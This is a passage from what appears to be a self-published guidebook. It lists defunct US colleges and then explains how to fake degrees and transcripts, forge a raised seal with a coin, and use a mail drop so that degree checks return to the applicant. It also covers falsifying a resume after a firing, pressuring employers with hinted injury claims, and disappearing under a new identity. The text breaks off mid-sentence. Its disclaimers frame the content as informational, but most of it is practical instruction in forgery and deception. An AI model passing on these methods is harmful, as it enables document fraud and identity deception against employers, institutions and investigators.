+Daniel Payne College Birmingham, AL +Southeastern Institute of +AL +Technology +Arizona Bible College Phoenix, AZ +Del Rey College Phoenix, AZ +Ganado College Ganado, AZ +Professional Studies Institute Phoenix, AZ +Ambassador College CA +American National University LaPalma, CA +American College of Finance Sunnyvale, CA +Antioch University San Francisco, CA +Bay Area Open College San Francisco, CA +California American University Escondido, CA +California Concordia College Oakland, CA +College of Professional +San Francisco, CA +Studies +Eldorado College Oceanside, CA +Grant Technical College Sacramento, CA +Heald Business College Oakland, CA +Highland College Pasadena, CA +Holy Family Junior College Fremont, CA +International College of L.A. Los Angeles, CA +Immaculate Heart College Los Angeles, CA +Justice University Sacramento, CA +Lone Mountain College San Francisco, CA +Northrop University Inglewood, CA +Ocean University Santa Monica, CA +Pasadena Playhouse College +Pasadena, CA +of the Theatre Arts +Russell College Burlingame, CA +Saint Joseph’s College Santa Clara, CA +San Luis Rey College San Luis Rey, CA +© Copyright 2011, Ariza Research, All rights reserved - ABP - 272 - +Reproduction in any form is prohibited without written permission. + +Tahoe College Lake Tahoe, CA +University of Applied Studies Hacienda, CA +West Coast Christian College Fresno, CA +Westland College Fair Oaks, CA +Boulder Graduate School Boulder, CO +Saint Thomas Theological +Denver, CO +Seminary +Western Colorado University Grand Junction, CO +Annhurst College South Woodstock, CT +Dicesan Sisters College Bloomfield, CT +Ct. Holy Family Seminary West Harford, CT +Longview College Enfield, CT +College of Notre Dame of +Wilton, CT +Wilton +Saint Alphonsus College Suffield, CT +Saint Basil’s College Stamford, CT +Saint Thomas Seminary Bloomfield, CT +Silvermine College of Art New Canaan, CT +Cortez Business College Washington, DC +Dunburton College of the Holy +Washington, DC +Cross +Holy Cross College Washington, DC +Immaculata Junior College Washington, DC +Marjorie Webster Junior +Washington, DC +College +Oblate College Washington, DC +Saint Joseph’s Seminary +Washington, DC +College +Saint Paul’s College Washington, DC +Washington International +Washington, D.C. +College +Briarcliff College Miami, FL +Collier-Blocker Junior College Palatka, FL +Florida Bible College Kissimmee, FL +Florida Gibbs Junior College St. Petersburg, FL +Hampton Junior College Ocala, FL +Hollywood College Hollywood, Fl +Jackson Junior College Marianna, FL +Johnson Junior College Leesburg, FL +© Copyright 2011, Ariza Research, All rights reserved - ABP - 273 - +Reproduction in any form is prohibited without written permission. + +Liberty Christian College Pensacola, FL +Lincoln Junior College Ft. Pierce, Fl +College of Orlando Orlando, FL +Roosevelt Junior College W. Palm Beach, FL +Rosenwald Junior College Panama City, FL +Saint Joseph College of +Jensen Beach, FL +Florida +Suwannee River Junior +Madison, FL +College +Volusia County Community +Daytona Beach, FL +College +Washington Junior College Pensacola, Fl +Aquinas Institute of Theology River Forest, IL +Berean College Jacksonville, IL +Central YMCA Community +Chicago, IL +College +Chicago Technical College Chicago, IL +De Lourdes College Des Plaines, IL +Divine Word Seminary Techny, IL +Immaculate College Bartless, IL +Lincoln Open University Lombard, Il +Metropolitan Community +E. Saint Louis, IL +College +Montay College Chicago, IL +Monticello College Godfrey, IL +Pestalozzi Froebel Teachers +Chicago, IL +College +Saint Bede College La Salle, IL +Saint Dominic College St. Charles, IL +Saint Viator College Bourbonnais, IL +Shurtleff College Alton, IL +Toletine College Olympia Field, IL +Trinity Evangelical Divinity +IL +School +Williams & Vashti Aledo, IL +Winston Churchill College Pontiac, IL +Aristotle College IN +Canterbury College Danville, IN +Graceland University New Albany, IN +© Copyright 2011, Ariza Research, All rights reserved - ABP - 274 - +Reproduction in any form is prohibited without written permission. + +Lockyear College Evansville, IN +Northwood Institute of Indiana West Baden IN +Saint Benedict College Ferdinand, IN +Saint Meinrad College Saint Meinrad, IN +Midwestern College Denison, IA +University of Mid-America +Council Bluffs, IA +(Iowa) +Westmar University LeMars, IA +Bluemont Central College Manhattan, KS +College of Emporia Emporia, KS +Garfield University Wichita, KS +Marymount College of Kansas Salina, KS +Saint John’s Lutheran College Winfield, KS +Saint Mary of the Plains +Dodge City, KS +College +Saint Mary’s College Saint Mary’s, KS +Calvary Bible College Letcher, KY +Cedar Bluff College Woodburn, KY +Glasgow Normal School Glasgow, KY +Kentucky Southern College Louisville, KY +Lees College Jackson, KY +Lexington Baptist College Lexington, KY +Ogden College KY +Pleasant J. Potter College Bowling Green, KY +Southeastern Christian College Winchester, KY +Sue Bennett College London, KY +Urania College Glasgow, KY +Warren College Bowling Green, KY +Baton Rouge College Baton Rouge, LA +Bell City College Bell City, LA +Gulf Coast Christian College Plaquemine, LA +Leatchie Female College Keatchie, LA +Lousiana Holiness College Hudson, LA +Louisiana Central University Metairie, LA +Mount Lebanon University Mount Lebanon, LA +Saint Mary’s Dominican +New Orleans, LA +College +World Evangelism Bible Baton Rouge, LA +© Copyright 2011, Ariza Research, All rights reserved - ABP - 275 - +Reproduction in any form is prohibited without written permission. + +College +Bliss College Lewiston, ME +Nasson College Springvale, ME +Northern Conservatory of +Bangor, ME +Music +Ricker College Houlton, ME +Baltimore College of +Baltimore, MD +Commerce +Saint Joseph College Emmitsburg, MD +Saint Peter’s College Baltimore, MD +Sojouner-Douglass College Baltimore, MD +Trinitarian College Baltimore, MD +Washington Junior Collegew Takoma Park, MD +Xaverian College Silver Springs, MD +Aquinas College at Newton Newton, MA +Berkshire Christian College Lennox, MA +Bradford College Haverhill, MA +Bryant & Stratton Business +Boston, MA +Institute +Calvin Coolidge College of +MA +Liberal Arts +Cambridge Junior College Cambridge, MA +Cardinal Cushing College Brookline, MA +Central New England College Worcester, MA +Middlesex University Waltham, MA +Mount Alvernia College Newton, MA +Newton College of the Sacred +Newton, MA +Heart +Newton Junior College Newton, MA +Northampton Junior College Northampton, MA +Oblate College & Seminary Natwick, MA +Perry Normal School Boston, MA +Worcester Junior College Worcester, MA +De Lima Junior College Oxford, MI +Detroit Institute of Technology Detroit, MI +Duns Scotus College Southfield, MI +Highland Park Community +Highland Park, MI +College +John Wesley College Owosso, MI +© Copyright 2011, Ariza Research, All rights reserved - ABP - 276 - +Reproduction in any form is prohibited without written permission. + +Jordan College & Seminary Cedar Springs, MI +Jordan College Flint, MI +Mackinac College Mackinac Island, MI +Maryglade College Memphis, MI +Meinzinger Art School Detroit, MI +Nazareth College Kalamazoo, MI +Shaw College Detroit, MI +Crosier Seminary Onamia, MN +Duluth Junior College Duluth, MN +Golden Valley Lutheran +Minneapolis, MN +College +Lea College Alberta Lea, MN +Minnesota Central University Hastings, MN +Saint Teresa College Winona, MN +Clarke Memorial College Newton, MS +Gulf Park Junior College Gulfport, MS +Mississippi Industrial College Holly Springs, MS +Phillips Junior College Gulfport and Jackson, MS +Whitworth Bible College Brookhaven, MS +Cardinal Newman College MO +Chillicothe Business College Chillicothe, MO +Springfield, Joplin, +Draughon Business College +Independence, MO +International Graduate School St. Louis, MO +Jackson University Chillicothe, MO +Louis Touton Junior College Kansas City, MO +Marillac College Saint Louis, MO +Marion College Philadelphia, MO +McGhee College College Mound, MO +McGhee Holiness College College Mound, MO +Midwestern Baptist Theological +Saint Louis, KS +Seminary +Saint Notre Dame College Saint Louis, MO +Saint Mary’s College O’Fallon, MO +Saint Paul’s College Concordia, MO +Duchesne College of the +Omaha, NE +Sacred Heart +Hiram Scott College Scottsbluff, NE +© Copyright 2011, Ariza Research, All rights reserved - ABP - 277 - +Reproduction in any form is prohibited without written permission. + +John F. Kennedy College Wahoo, NE +John J. Pershing College Beatrice, NE +Saint John Vianney Seminary Elkhorn, NE +Old College Rena, NV +Belknap College NH +Canaan College NH +Concord Commercial College NH +Franconia College NH +Gunstock College NH +Mt. Saint Mary’s College NH +Nathaniel Hawthorne College NH +Pierce College for Women NH +Franconia College Franconia, NH +Alma White College Zarephath, NJ +Bayonne Junior College Bayonne, NJ +Don Bosco College Newton, NJ +Hudson College Jersey City, NJ +Northeastern Bible College Essex Falls, NJ +Shelton College Cape May, NJ +Tombrock College Paterson, NJ +Upsala College East Orange, NJ +Albany Business College Albany, NY +Bennett College Millbrook, NY +Brentwood College Brentwood, NY +Briarcliff College Briarcliff Manor, NY +Brooklyn Jusuit College Brooklyn, NY +Capuchin Theological +Garrison, NY +Seminary +Cathedral College Flushing, NY +Elizabeth Seton College Yonkers, NY +Finch College New York City, NY +Genessee College Lima, NY +The King’s College Briarcliff, NY +Ladycliff College Highland Falls, NY +Maria Regina College Syracuse, NY +Maryknoll School of Theology Maryknoll, NY +Mater Christi Seminary Albany, NY +Mills College of Education New York, NY +© Copyright 2011, Ariza Research, All rights reserved - ABP - 278 - +Reproduction in any form is prohibited without written permission. + +New York College of Music New York, NY +Our Lady of Hope Mission +Newburgh, NY +Seminary +Packer Collegiate Institute +Brooklyn, NY +(Junior College) +Passionist Monastic Seminary Jamaica, NY +Rogers College Maryknoll, NY +Russell Sage College NY +Saint Clare College Williamsville, NY +Saint John Vianney Seminary East Aurora, NY +Saint Joseph’s Seraphic +Callicoon, NY +Seminary +Verrazzano College Saratoga Springs, NY +Woodstock College New York, NY +Blantons Junior College Asheville, NC +Phillips Junior College Fayetteville, NC +Sacred Heart College Belmont, NC +Yadkin College NC +Assumption College Richardton, ND +Ellendale State Teachers +Ellendale, ND +College +Fargo College Fargo, ND +Methodist Red River University Wahpeton, ND +Alfred Holbrook College Manchester, OH +Bliss College Columbus, OH +Columbia Business College Columbus, OH +Dayton Art Institute Dayton, OH +Mary Manse College Toledo, OH +Marycrest College Toledo, OH +Midland College of Commerce Ashland, OH +Penn-Ohio College Youngstown, OH +American Christian College Tulsa, OK +Carey College Oklahoma City, OK +Flaming Rainbow University Stilwell, OK +Phillips University Enid, OK +Southwest Baptist College Mangum, OK +Cascade Christian College Portland, OK +Columbia Christian College Portland, OK +© Copyright 2011, Ariza Research, All rights reserved - ABP - 279 - +Reproduction in any form is prohibited without written permission. + +Mount Angel College Mount Angel, OK +Judson Baptist College Portland, OR +Philomath College Philomath, OR +Alliance College Cambridge Springs, PA +Antioch University Philadelphia, PA +Dropsie College Philadelphia, PA +Franklin and Marshall College Lancaster, PA +Hershey Junior College Hershey, PA +Mary Immaculate Seminary & +Northhampton, PA +College +Penn Hall Junior College Chambersburg, PA +Pinebrook Junior College Coopersburg, PA +Saint Fidelis College Herman, PA +Spring Garden College Philadelphia, PA +Mount Saint Joseph College Wakefiekd, RI +Our Lady of Providence +Warwick, RI +Seminary +Friendship College Rock Hills, SC +Palmer College Charleston, Sc +Freeman Junior College Freeman, SD +Yankton College Yankton, SD +Andrew Jackson Business +Memphis, TN +College +Boscobel College Nashville, TN +Bristol University Bristol, TN +Draughons Junior College of +Kingsport & Knoxville, TN +Business +McKenzie College Chattanooga, TN +Roger Williams University Nashville, TN +Siena College Memphis, TN +Steed College Johnson City, TN +Tomlinson College Cleveland, TN +Abiline Christian University Abiline, TX +Ambassador University Big Sandy, TX +Christopher College Corpus Christi, TX +Dominican College Houston, TX +Eastern Texas University San Augustine, TX +Houston International +Houston, TX +University +© Copyright 2011, Ariza Research, All rights reserved - ABP - 280 - +Reproduction in any form is prohibited without written permission. + +Plano College Plano, TX +Ruterville College La Grande, TX +San Augustine University San Augustine, TX +Soule Univesity S. Chappel Hill, TX +Southern Bible College Houston, TX +Waco Female College Waco, TX +Woodcrest College Dallas, TX +Stevens Henager College Salt Lake City, UT +Windham College Putney VT +Blackstone College Blackstone, VA +Elizabeth College Salem, VA +Father Judge Mission +Monroe, VA +Seminary +Frederick College Portsmouth, VA +Hopewell University Hopewell, VA +Luther Rice College Alexandria, VA +Potomac Community College Paris, VA +Smithdeal-Massey Business +Richmond, VA +College +Stratford College Danville, VA +Sullins College Bristol, VA +Fort Wright College of the Holy +Spokane, WA +Names +Griffin College Seattle, WA +Spokane Christian College Spokane, WA +Greenbriar College Lewisburg, WV +West Liberty State Hancock & Wierton, WV +Ashland County Teachers +Ashland WI +College +Barron County Teachers +Rick Lake, WI +College +Buffalo County Teachers +Alma, WI +College +Dodge County Teachers +Mayville, WI +College +Door-Kewaunee County +Algoma, WI +Teachers College +Dunn County Teachers +Menomonie, WI +College +Green County Teachers Monroe, WI +© Copyright 2011, Ariza Research, All rights reserved - ABP - 281 - +Reproduction in any form is prohibited without written permission. + +College +Layton School of Art & Design Milwaukee, WI +Lincoln County Teachers +Merrill, WI +College +Madison College Madison, WI +Milton College Milton, WI +Mount Saint Paul College Waukesha, WI +College of Racine Racine, WI +Wyoming College of Advanced +WY +Studies +The Strange Case of Mr. Gallagher +Later one night just before midnight I awoke to someone pounding +loudly on my front door. When I opened it in rushed an old friend +that I hadn’t seen in over a year. He plopped himself down on my +sofa and with a broad grin demanded that I give him a thousand +dollars in cash. He said it was the deal of the century and that I’d +never regret it. Ken had always been a straightforward guy though +I can’t say much about his morals. I calmed him down and finally +he gave me the story. +He had met a young lady at a local singles bar who worked in the +administrative office of a large private university. For a fee of one +thousand dollars cash she would make a copy an actual +graduate’s transcript, insert our names and social security +numbers on the copies and then insert them into the official +records so that anyone calling could easily obtain a verification. +In short she would sell anyone with a grand a bachelors degree in +whatever subject they liked. I have to be honest with you, I gave it +some thought. But in the end I declined to join Ken in his +adventure. +Ken and I had lunch two years later. When we returned to his +office there it was hanging on the wall - his phony university +degree! He was running a division of a local manufacturing +company and had over a hundred employees working under him, +was pulling down a generous six-figure income and drove a new +company-owned Cadillac. Ken could get away with this sort of +ploy simply because he had nerves of steel. I wasn’t wired that +way. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 282 - +Reproduction in any form is prohibited without written permission. + +You should know that from time to time you’ll read a report in the +paper about the police breaking up such a degree-for-sale +operation. If your inside accomplice is ever arrested, you might +find yourself in considerable legal trouble. +If you do go ahead and claim an unearned degree, don’t be at all +surprised if an interviewer actually hands you the degree +verification form along with a stamped envelope and asks you to +take care of submitting it. This is a surprisingly common practice, +despite the fact that this makes it childishly simple to “verify” a +forged or enhanced transcript. +A common hurdle to forging or embellishing a college transcript is +the raised seal. As is the case with so many other official +documents, a transcript will not be acceptable unless it includes a +circular raised seal created though the use of an official seal by +the proper issuing authority (in this case the university). How can +you get past this requirement? The solution is laughably simple. +Get a largish coin, a Kennedy half dollar will do nicely but a +common quarter will do in a pinch. Place the coin on a hard +surface with the reverse side up. Then place the document over +the coin and rub the document with your fingertip running it around +and around the rim so that a nice round impression is made on +your document. Then rub some more on the middle of the coin. +But only just enough to cause a fuzzy raised seal to appear, being +careful to avoid the wording “fifty cents”. +What you’re left with is a nice unfocused raised image with no +readable text. Nine times out of ten it’ll produce a perfectly +acceptable impression. I learned this one from one of my friends +who spent some time as a guest in one of Uncle Sam’s prisons. +He said he’d used it on various birth certificates to obtain over a +dozen different drivers licenses. He told me that many criminals +actually carry around a Kennedy half dollar in their shaving kits +just for this purpose. +When Did You Say You Went to College? +When claiming a bogus degree always remember to leave enough +off time in your resume to allow the required college attendance. +Degrees just don’t happen instantly, they require long years of +work. And if you claim that you attended college while you worked, +you’ll have to allot an even longer period. Be well prepared to +explain how and when you earned your listed degree. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 283 - +Reproduction in any form is prohibited without written permission. + +Also keep in mind that your job title and listed salary must be in +line with your claimed academic qualifications. Be sure that your +salary after earning your degree reflects the expected increase. If +not, it’ll raise a red flag. +Please be very careful to avoid using these techniques to go after +a job that’s obviously over your head. Don’t get intoxicated with +the idea of earning a huge salary. Believe me, this is a formula for +disaster. Unless you’re absolutely sure that you possess the skills +and experience necessary to be successful in your new position – +stay within your capabilities. +If you can, visit the campus of your new alma mater. Stroll around, +taking particular note of the streets and bars in the immediate +vicinity. Get a copy of the school’s catalog and study it carefully. +Commit to memory two or three of the more prominent professor’s +names and faces. +College transcripts are extremely easy to forge. Simply get a copy +of someone else’s legitimate transcript and a copy of the college +catalog for the period you’ll claim you attended (larger libraries +usually have past school catalogs). Make as good a copy of the +real transcript as you can, use cover up strips to block out your +name and other personal information. +Then use a computer or typewriter to replace the previous +personal information with your own. You can plan to spend an +entire evening working out the details of your new/old degree and +creating a believable copy of your transcripts. And be sure to +include that all-important raised seal. +You may also want to know that several of the larger Universities +are international in scope. They maintain locations both here in +the US and overseas. One of the largest of these is one that’s +located in the state of Maryland. +If you claim a degree from one of these international schools and +your future employer should experience problems when they +attempt to verify your degree, you could claim that the university +has so many different operations that the verification process is +rather unreliable. I’ve known several people who have +successfully used this approach. It’s a common and therefore +believable story. +Never forget that those friendly folks who run mail drops will gladly +open a box for you through the mail. See the list of mail drops at +the end of this report. You can then use this new box as the +college’s official mailing address. Which means that the degree +verification form will be sent directly to you so that you can then +provide the verification yourself. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 284 - +Reproduction in any form is prohibited without written permission. + +How to Handle Being Fired +Most people haven’t got a clue what to do when faced with a job +termination. It’s usually very difficult to think clearly when you’re +emotionally upset. Contrary to most people’s opinion, most firings +are political in nature and seldom involve honesty or performance +issues (but you can expect these issues to be raised as +justification for your termination). Please read the following and try +and commit it to memory. It might come in very handy at some +point in the future. +When being fired the most important thing to remember is – don’t +panic! The situation is not as bad as you might think. There are a +host of forces at play which will come to your aid. No matter how +bad the situation is, always remember that you’re not in an entirely +powerless position. You have some rather powerful cards to play. +Stay calm. No matter how wildly your guts are grinding, don’t lose +your cool. +Managers are after all, human beings. And no matter how they +personally feel about you, all managers hate to do terminations. +They fear you’ll go ballistic and cause a scene. Or even get violent +and attempt to harm them. So to smooth your exit most employers +will openly offer to provide you with a standard positive +employment reference provided you leave quickly and quietly. +They won’t offer you this fig leaf out of the kindness of their hearts. +They’ll do it because they’re scared to death that you’ll launch one +of those much-dreaded high profile, bazillion-dollar “wrongful +termination” lawsuits. +Being an executive today is a bit like tap dancing through a +minefield. Every day the courts award fired employees generous +settlements for the most groundless of claims. Also, rather than +fight it out in the courts over a matter of principle, most employers +will quickly attempt to settle out-of-court due to the fabulous cost +of court proceedings. +Several months back when a firm called a manager asking for an +employment reference on a former employee who was a good +worker, he gladly sang his praises. The entire phone call took all +of sixty seconds. He then put the call entirely out of his mind. +Two months later the legal department called. They wanted to +know exactly what he had said during the phone call as the former +employee was suing for discrimination claiming generous +damages in the mid six figures. The firm settled out of court rather +than fight the baseless charges. The manager now has all his +calls screened and steadfastly refuses to discuss former +employees over the phone. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 285 - +Reproduction in any form is prohibited without written permission. + +In the unlikely event that they don’t volunteer to say nice things +about you, firmly insist that they do while you’re still on the payroll +and on company premises. +Once you go home, you lose some of your bargaining power. You +might say something like “OK, I’ll go quietly but only if in return +you’ll give me a normal positive employment reference including a +positive rehire status”. +Most employers will agree to almost anything just to get you off +their property without a scene. This is an important detail that can +hurt you later if you forget to mention it. This is your price for +leaving quietly. +If in the end they decline to entertain your demand, calmly say that +you’re very disappointed with their decision. It would give you +much pain to have to get your attorney involved in this matter but +– hey – you’ve got to protect your legal rights and since they’re not +being reasonable – you’ll be forced to take up the matter with your +lawyer. +If you’ve been injured at any time during your employment, this +may be an excellent time to mention it as casually as possible. Did +you slip and fall on a hard floor? Or perhaps you had a problem +with a power tool. Whatever the nature of the accident, the mere +mention of it can instantly change a firing manager’s whole +attitude. +Besides fearing expensive law suits, employers are also paralyzed +with the fear that an employee will file a “workers’ compensation +claim” which will result in the premium for the entire company +being permanently increased. Employees with potentially +expensive injuries are usually given “kid glove” treatment and this +fact may be of use to you. +If you still can’t get that all-important positive reference, it’s time +for some drastic action. In most cities you’ll find numerous legal +clinics listed in the yellow pages. Call a few and ask how much +they charge to send a simple lawyer’s letter to a former employer. +These clinics usually charge very modest fees. The lawyer will +know exactly what to say in his letter, which will most probably +contain a veiled threat of legal action if you even suspect that a +negative reference has been given. +A lawyer’s letter may do the trick even though the employer +doesn’t acknowledge changing their position. You can bet that +your letter will be placed in your personnel file where it will be +viewed by anyone who is called upon to provide a employment +reference in the future. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 286 - +Reproduction in any form is prohibited without written permission. + +In the unlikely event that the firing firm still hasn’t given in, you’ll +be forced to consider using one of several forms of resume +modification. If you’ve been employed by the firing firm for less +than six months, the solution may be as simple as eliminating the +firing company from the top of the work history section of your +resume and then extending the employment dates for the previous +employer. It’ll be just as if you never even worked for the firing +company! This is an extremely common practice these days. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 287 - +Reproduction in any form is prohibited without written permission. + +How to Get Lost – And Stay That Way! +By James Petersen +© Copyright 2010, Ariza Research, All rights reserved +Disclaimer +This report is for informational and academic purposes only. Nothing in it is +intended to in any way encourage illegal activities now or at any time in the +future. Before attempting to employ any of the techniques discussed in this +report, consult a local attorney familiar with laws in your area. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 288 - +Reproduction in any form is prohibited without written permission. + +Laws change and the laws regarding the creation and use of +alternative identity documents have been changing quite +rapidly of late. Please be careful to review the laws regarding +identity creation and use before you consider using the +techniques discussed in this report. Please don’t break the +law. +I've always admired people who periodically reinvent +themselves. Rather than be content with living in a rut or +rolling over and dying, they manage to find just the right +cause and reemerge once again as a butterfly of a different +color. For them the status quo just won't do. Elizabeth Taylor +is the finest example I've found of a truly resilient individual. +The information contained in this report was collected over a +period of three years from more than thirty individuals. These +freedom lovers created a new life for themselves by +vanishing and then resurfacing in a new location under an +entirely new identity. At first my intention was to provide a +complete step-by-step checklist that anyone could use to +drop out of sight but after about a dozen interviews but I +quickly discovered that each person’s situation is entirely +unique. +So what I’ve done instead is to provide you with a basic +framework of general strategies and then include other +random insights that may or may not be of use to you in your +search for a new beginning. Before we go into specific +strategies, we’ll start off with the most important basic rules. +Rule Number One +And it really doesn’t matter who’s looking for you. It might be +the mob, a gang, a revenge-minded ex-spouse or a just plain +crazy person. After you shed your original identity, some sort +of attempt will be made to find you. +After you go, everyone who knew you well will probably +receive a phone call from an investigator. At first they will +just ask for information. They will take any info they can get, +but they’ll also be sizing up all your friends and relatives for +further calls. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 289 - +Reproduction in any form is prohibited without written permission. + +They’ll use tricks like calling your parents and posing as an +attorney who has a huge check for you from the estate of +someone you did a favor for some years ago. Or they may +graduate to offering generous cash rewards or even using +illegal threats. +By telling no one of your plans, you won’t have to worry +about which of your friends and relatives might "cave-in" +under the pressure investigators will apply. Always +remember that an individual can’t reveal what they don’t +know. It seems to be a deep human need to share our +adventures and accomplishments with others. Call it pride or +call it ego. +Whichever, it can quickly be your undoing. You must keep +your mouth shut from the very beginning. It doesn’t matter +whether you confide in a friend, a family member or a lover. +After you vanish, they will all come under some level of +investigative pressure. If they’re not particularly tough- +minded, you’re at risk. So make up your mind to keep this +entire operation a complete and utter secret. No exceptions! +Rule Number Two +Dump your wheels. It is completely impossible to change +identities and keep your present vehicle if it’s currently +registered in your name. No matter how you change the title, +it will provide a 24-carat solid gold link straight to the new +you. +Even an amateur investigator will check with the DMV and +uncover the link in a matter of minutes. (Update: though +most states no longer sell DMV info to private citizens, +licensed investigators still have access to this data in all fifty +states) +Sell your current car privately for cash. No checks, just long +green. Under no circumstances should you trade it in on +your new car. +Again, this would create an obvious link. Think of your old +car as an item of identity in your old name. After you’ve +arrived in your new location you’ll buy another car under +your new name. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 290 - +Reproduction in any form is prohibited without written permission. + +I know this will come as a blow to those of you who are +attached to your cars, but given the free flow of information +in our society; it’s an absolute must. +You should know that over the past few years the federal +government (including the IRS) has begun to use vehicle +registration data to help them keep track of citizen +movements. For some odd reason most people are +extremely truthful about revealing their address on the +vehicle registration form. We're now getting used to paying +for and receiving our license tag stickers and annual vehicle +registration paperwork through the mail so we are forced into +giving them our home address. +You should be aware that the government is now taking full +advantage of this tendency toward honesty. The same goes +for real estate. If you own any, you'll have to sell them off +before you vanish. If you have any rental income property, +please don't delude yourself into thinking you can somehow +keep receiving income on it after you've changed your +identity. +Again, it's an obvious paper trail that links the two identities +to each other. Sell the property and clear the check for the +proceeds through your old bank account. After it clears +withdraw the cash slowly over as long a period as possible. +Rule Number Three +As you create the new you, it’s imperative that you +constantly strive to reduce any links between your old +persona and your new self. Some links will always exist. +They’re unavoidable. +Fortunately for you, most non-law enforcement investigators +do little more than scan the latest edition of the various +directories that are their bibles. They search the DMV, auto +registration, utility records, voters registration, public records +including court and property records and phone records. +If you plan your work and work your plan you’ll end up with a +relatively solid identity that will stand up to a moderate +degree of investigation. Most skip tracers will spend a few +weeks "working" your case. After that they’ll become +exhausted and shelve your file. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 291 - +Reproduction in any form is prohibited without written permission. + +Any further effort would not be profitable, so they'll usually +put your file on the back burner. If you’re still undiscovered +six months later you can assume that you're safe, unless you +do something stupid in which case the whole house of cards +will come crashing down with a loud "thud". +And remember, one wrong move could resurface several +years later to destroy all you’ve worked for. Careful planning +and execution will make the job of finding you so difficult that +almost any investigation will run out of gas well before they +find you. This report will provide you with some rather +inventive strategies that will effectively cover your tracks and +make live difficult for anyone on your trail. +If you’re leaving an ex-spouse or lover, refrain from taking +anything from them that isn’t truly yours. The last thing you +need is an ex-lover/spouse on your trail seeking revenge. +After you establish your new identity and relocate - carry +only identification in your new name. It’s best to burn all of +your old ID documents and credit cards. If you don’t - at least +hide them in a very secure place away from your new +residence. +A brief story with a message. A man killed his wife and +vanished. The police worked the case for over three years to +no avail. Finally the family of the dead woman hired one of +the best private investigators in the country. He asked the +police what the wanted fugitive did for a living and when he +heard he boasted in full voice that he could find the man +within ten minutes. +He asked about the reward. The police replied it was a +whopping $50,000. He asked that the police chief put it in +writing which they did. The investigator then called the +offices of a popular architecture trade publication. Posing as +an architect he told them that he was getting married and +wanted to invite an old college friend but didn’t have his +current address. The nice lady in subscriptions provided the +address in less than two minutes. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 292 - +Reproduction in any form is prohibited without written permission. + +He handed the data over to the police who immediately had +the man arrested and the clever investigator went home with +a check for fifty grand for only two minutes work! +Even the smallest link can be a disaster. Leave your +magazine and any other mail subscriptions to lapse. Any +attempt to change an address will create an unacceptable +link. +You’ll also have to abandon your favorite hobbies and social +activities. These are other avenues investigators will use to +find you. One man was found by his alimony-hungry ex-wife +when an investigator made the rounds of his new home town +showing his picture to all the owners of the stores that sell +those little electric model racing cars than run on slotted +tracks. +They only had to contact four stores before they discovered +his new hang-out. The next Saturday morning our man came +strolling into the place completely unaware that he was +about to be arrested. For at least the first six months or a +year stay away from the places you would normally gravitate +to. Instead, plan to explore entirely new hobbies and +activities. +You’ll also have to change or alter your occupation. An +investigator will easily find you if you’re in a licensed trade or +profession. An experienced investigator will know to call all +the probable employers in your new town. One fellow I knew +was a cab driver. When an investigator started to make calls +to all the cab companies in a town he stumbled on his target +on only the second call! Don’t make it easy for them. +If you take the tools of your trade with you, they'll give your +pursuers an excellent idea of your intentions and where they +may find you. It might be best to make a show of leaving +them behind even though you plan to continue on working in +that same field. +The motto is - don’t leave links behind that can lead an +investigator to you. Make yourself untraceable. It’s amazing +to me that so many identity-changers overlook little details +like magazine subscriptions and credit cards. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 293 - +Reproduction in any form is prohibited without written permission. + +Don't even think of using your old credit cards at your new +location - tracking your movements by your credit cards +records is a very simple process these days. +Rule Number Four +This is a biggie. Maybe it should be number one. Do not +leave debts behind! Far too many identity-changers find it +impossible to resist the greedy urge to run up their credit +cards before shedding their old lives. This is some of the +best advice I can give you. +Your new life will be much more secured with no one on your +trail. If you’re the subject of an FBI manhunt, you’ll be lucky +to last ten days, even if you’re very, very clever. If only the +local police are looking for you, you might last a few years or +longer. If no one is actively looking for you – living under +your new identity will be a breeze. +Leaving behind even a small debt can cause big problems +later on down the road. One lady worked for a full year to +create a new life for herself, which was completely exposed +by a persistent collection agent who tracked her down over a +lousy $85 phone bill she left behind! And to make things +worse, she had intended to pay the bill but didn't as it arrived +a few days after her departure. Be sure you cover all the +bases and get those bills paid in full. +Skip tracers and bill collectors manage to locate about 75% +of their targets. Be sure you’re in the 25% they don’t find. +Smart identity-changers are usually successful while +criminals are usually caught after a few weeks or months. It’s +all a matter of whose looking for you, how motivated they are +and how carefully you’ve constructed your new life. +If no one is on your trail, what have you got to worry about? +Nothing! This is the only way to establish a really sound new +identity. With no one working from the other end to expose +you, you can go about your business without much worry. +But if you leave debts of any kind behind, you can count on +having an experienced, determined bank investigator on +your trail and they won’t easily give up. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 294 - +Reproduction in any form is prohibited without written permission. + +Some things just aren’t worth the risk. And if the bank +investigator thinks he detects credit card fraud, you can bet +he’ll have considerable resources placed at his disposal. +This is not the way to start a secure new life. +Rule Number Five +Burn your bridges. Your old and new selves must be +completely divorced. No phone calls back to old lovers. No +contact with family members. When ex-mobsters testify +against their former Mafia bosses, the government puts them +in a witness protection program. They are given completely +new identities and moved to new locations. Many of these +guys have been brutally murdered just because they phoned +family members directly or mentioned something in a letter +that could be used to locate them. +If you search around the web you'll find some very +interesting information on the federal witness protection +program. It includes a checklist that you should read. Many +people find it very difficult to abandon their old clergymen, +doctors, neighbors, friends and family members. Once the +subjects have been briefed and are ready to travel to their +new location, they are flown there through a minimum of +three intermediate locations. They fly under assumed names +and in each city they are housed in a government "safe +house". Since hotel records are easily checked, this ensures +that they'll leave behind no traceable records. +After a few days in each spot, they move onto the next. It +must be a real pain having to travel around the country on +the sly but through hard experience the feds have learned +that this is the only really effective way to move someone +from one place to another without leaving behind a paper +trail. +You might want to explore getting a divorce or filing for +bankruptcy (or both!) before your departure. If either one is +tempting, consult with an experienced attorney for expert +advice. (Ariza Research publishes a unique bankruptcy +guide entitled "Bankruptcy Secrets". For more info visit our +web site at: www.personalbankruptcysecrets.com.) +© Copyright 2011, Ariza Research, All rights reserved - ABP - 295 - +Reproduction in any form is prohibited without written permission. + +If you ask, the post office will tell you that their official policy +is to never open mail (except when a letter ends up in the +dead letter office - where it’s opened in an attempt to obtain +a delivery address). What they don’t tell you is 